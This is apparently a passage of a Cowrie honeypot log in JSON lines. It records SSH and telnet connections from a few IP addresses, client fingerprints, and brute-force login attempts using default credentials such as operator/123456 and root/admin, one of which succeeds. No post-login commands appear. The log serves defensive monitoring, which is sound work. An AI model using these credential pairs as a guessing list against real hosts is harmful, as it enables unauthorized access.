{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37352,"dst_ip":"1.2.3.4","dst_port":22,"session":"0672a5abb2a5","protocol":"ssh","message":"New connection: 212.227.125.160:37352 (1.2.3.4:22) [session: 0672a5abb2a5]","sensor":"my-vps","timestamp":"2025-08-28T13:36:15.292021Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T13:36:15.292793Z","src_ip":"212.227.125.160","session":"0672a5abb2a5"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T13:36:15.455764Z","src_ip":"212.227.125.160","session":"0672a5abb2a5"}
{"eventid":"cowrie.login.failed","username":"nginx","password":"qwerty","message":"login attempt [nginx/qwerty] failed","sensor":"my-vps","timestamp":"2025-08-28T13:36:15.941192Z","src_ip":"212.227.125.160","session":"0672a5abb2a5"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:36:17.180505Z","src_ip":"212.227.125.160","session":"0672a5abb2a5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51240,"dst_ip":"1.2.3.4","dst_port":23,"session":"36386a7f7948","protocol":"telnet","message":"New connection: 212.227.125.160:51240 (1.2.3.4:23) [session: 36386a7f7948]","sensor":"my-vps","timestamp":"2025-08-28T13:36:35.436679Z"}
{"eventid":"cowrie.session.closed","duration":13.295930862426758,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:36:48.732537Z","src_ip":"212.227.125.160","session":"36386a7f7948"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53116,"dst_ip":"1.2.3.4","dst_port":22,"session":"722925e62498","protocol":"ssh","message":"New connection: 212.227.125.160:53116 (1.2.3.4:22) [session: 722925e62498]","sensor":"my-vps","timestamp":"2025-08-28T13:36:51.161945Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T13:36:51.327701Z","src_ip":"212.227.125.160","session":"722925e62498"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T13:36:51.328902Z","src_ip":"212.227.125.160","session":"722925e62498"}
{"eventid":"cowrie.login.failed","username":"nginx","password":"123123","message":"login attempt [nginx/123123] failed","sensor":"my-vps","timestamp":"2025-08-28T13:36:52.010977Z","src_ip":"212.227.125.160","session":"722925e62498"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:36:53.176348Z","src_ip":"212.227.125.160","session":"722925e62498"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49564,"dst_ip":"1.2.3.4","dst_port":22,"session":"bf41a299e6ca","protocol":"ssh","message":"New connection: 212.227.235.229:49564 (1.2.3.4:22) [session: bf41a299e6ca]","sensor":"my-vps","timestamp":"2025-08-28T13:36:55.698394Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T13:36:55.699316Z","src_ip":"212.227.235.229","session":"bf41a299e6ca"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T13:36:55.907704Z","src_ip":"212.227.235.229","session":"bf41a299e6ca"}
{"eventid":"cowrie.login.failed","username":"io","password":"io","message":"login attempt [io/io] failed","sensor":"my-vps","timestamp":"2025-08-28T13:36:56.784851Z","src_ip":"212.227.235.229","session":"bf41a299e6ca"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:36:57.997132Z","src_ip":"212.227.235.229","session":"bf41a299e6ca"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44929,"dst_ip":"1.2.3.4","dst_port":22,"session":"6c1684f87607","protocol":"ssh","message":"New connection: 212.227.125.160:44929 (1.2.3.4:22) [session: 6c1684f87607]","sensor":"my-vps","timestamp":"2025-08-28T13:36:57.998272Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T13:36:57.999254Z","src_ip":"212.227.125.160","session":"6c1684f87607"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T13:36:58.088725Z","src_ip":"212.227.125.160","session":"6c1684f87607"}
{"eventid":"cowrie.login.failed","username":"","password":"","message":"login attempt [/] failed","sensor":"my-vps","timestamp":"2025-08-28T13:36:58.502351Z","src_ip":"212.227.125.160","session":"6c1684f87607"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:36:59.585936Z","src_ip":"212.227.125.160","session":"6c1684f87607"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47270,"dst_ip":"1.2.3.4","dst_port":22,"session":"6a279a614769","protocol":"ssh","message":"New connection: 212.227.125.160:47270 (1.2.3.4:22) [session: 6a279a614769]","sensor":"my-vps","timestamp":"2025-08-28T13:37:27.697286Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T13:37:27.698474Z","src_ip":"212.227.125.160","session":"6a279a614769"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33536,"dst_ip":"1.2.3.4","dst_port":23,"session":"15cbc26c7ced","protocol":"telnet","message":"New connection: 212.227.235.229:33536 (1.2.3.4:23) [session: 15cbc26c7ced]","sensor":"my-vps","timestamp":"2025-08-28T13:37:27.815435Z"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T13:37:27.874040Z","src_ip":"212.227.125.160","session":"6a279a614769"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-28T13:37:28.007029Z","src_ip":"212.227.235.229","session":"15cbc26c7ced"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T13:37:28.023337Z","src_ip":"212.227.235.229","session":"15cbc26c7ced"}
{"eventid":"cowrie.login.failed","username":"nginx","password":"111111","message":"login attempt [nginx/111111] failed","sensor":"my-vps","timestamp":"2025-08-28T13:37:28.404265Z","src_ip":"212.227.125.160","session":"6a279a614769"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:37:29.580851Z","src_ip":"212.227.125.160","session":"6a279a614769"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42460,"dst_ip":"1.2.3.4","dst_port":22,"session":"d1474f6c1caf","protocol":"ssh","message":"New connection: 212.227.125.160:42460 (1.2.3.4:22) [session: d1474f6c1caf]","sensor":"my-vps","timestamp":"2025-08-28T13:38:03.435081Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T13:38:03.435968Z","src_ip":"212.227.125.160","session":"d1474f6c1caf"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T13:38:03.604019Z","src_ip":"212.227.125.160","session":"d1474f6c1caf"}
{"eventid":"cowrie.login.failed","username":"nginx","password":"1234567","message":"login attempt [nginx/1234567] failed","sensor":"my-vps","timestamp":"2025-08-28T13:38:04.112195Z","src_ip":"212.227.125.160","session":"d1474f6c1caf"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:38:05.289720Z","src_ip":"212.227.125.160","session":"d1474f6c1caf"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53702,"dst_ip":"1.2.3.4","dst_port":22,"session":"76d2ff50d81e","protocol":"ssh","message":"New connection: 212.227.125.160:53702 (1.2.3.4:22) [session: 76d2ff50d81e]","sensor":"my-vps","timestamp":"2025-08-28T13:38:39.431955Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T13:38:39.567756Z","src_ip":"212.227.125.160","session":"76d2ff50d81e"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T13:38:39.634913Z","src_ip":"212.227.125.160","session":"76d2ff50d81e"}
{"eventid":"cowrie.login.failed","username":"operator","password":"123456","message":"login attempt [operator/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T13:38:40.309823Z","src_ip":"212.227.125.160","session":"76d2ff50d81e"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:38:41.487107Z","src_ip":"212.227.125.160","session":"76d2ff50d81e"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":50734,"dst_ip":"1.2.3.4","dst_port":22,"session":"e1a0f0aa4255","protocol":"ssh","message":"New connection: 217.72.205.35:50734 (1.2.3.4:22) [session: e1a0f0aa4255]","sensor":"my-vps","timestamp":"2025-08-28T13:39:06.677624Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:39:06.678814Z","src_ip":"217.72.205.35","session":"e1a0f0aa4255"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51454,"dst_ip":"1.2.3.4","dst_port":22,"session":"e7e8c6711d04","protocol":"ssh","message":"New connection: 212.227.125.160:51454 (1.2.3.4:22) [session: e7e8c6711d04]","sensor":"my-vps","timestamp":"2025-08-28T13:39:14.563942Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T13:39:14.564789Z","src_ip":"212.227.125.160","session":"e7e8c6711d04"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T13:39:14.727748Z","src_ip":"212.227.125.160","session":"e7e8c6711d04"}
{"eventid":"cowrie.login.failed","username":"operator","password":"password","message":"login attempt [operator/password] failed","sensor":"my-vps","timestamp":"2025-08-28T13:39:15.301904Z","src_ip":"212.227.125.160","session":"e7e8c6711d04"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:39:16.466352Z","src_ip":"212.227.125.160","session":"e7e8c6711d04"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39426,"dst_ip":"1.2.3.4","dst_port":22,"session":"c86ee58e13bf","protocol":"ssh","message":"New connection: 212.227.125.160:39426 (1.2.3.4:22) [session: c86ee58e13bf]","sensor":"my-vps","timestamp":"2025-08-28T13:39:48.116208Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T13:39:48.121292Z","src_ip":"212.227.125.160","session":"c86ee58e13bf"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T13:39:48.287536Z","src_ip":"212.227.125.160","session":"c86ee58e13bf"}
{"eventid":"cowrie.login.failed","username":"operator","password":"123456789","message":"login attempt [operator/123456789] failed","sensor":"my-vps","timestamp":"2025-08-28T13:39:49.031577Z","src_ip":"212.227.125.160","session":"c86ee58e13bf"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:39:50.204330Z","src_ip":"212.227.125.160","session":"c86ee58e13bf"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56924,"dst_ip":"1.2.3.4","dst_port":22,"session":"65c8726856fd","protocol":"ssh","message":"New connection: 212.227.125.160:56924 (1.2.3.4:22) [session: 65c8726856fd]","sensor":"my-vps","timestamp":"2025-08-28T13:40:22.784775Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T13:40:22.786720Z","src_ip":"212.227.125.160","session":"65c8726856fd"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-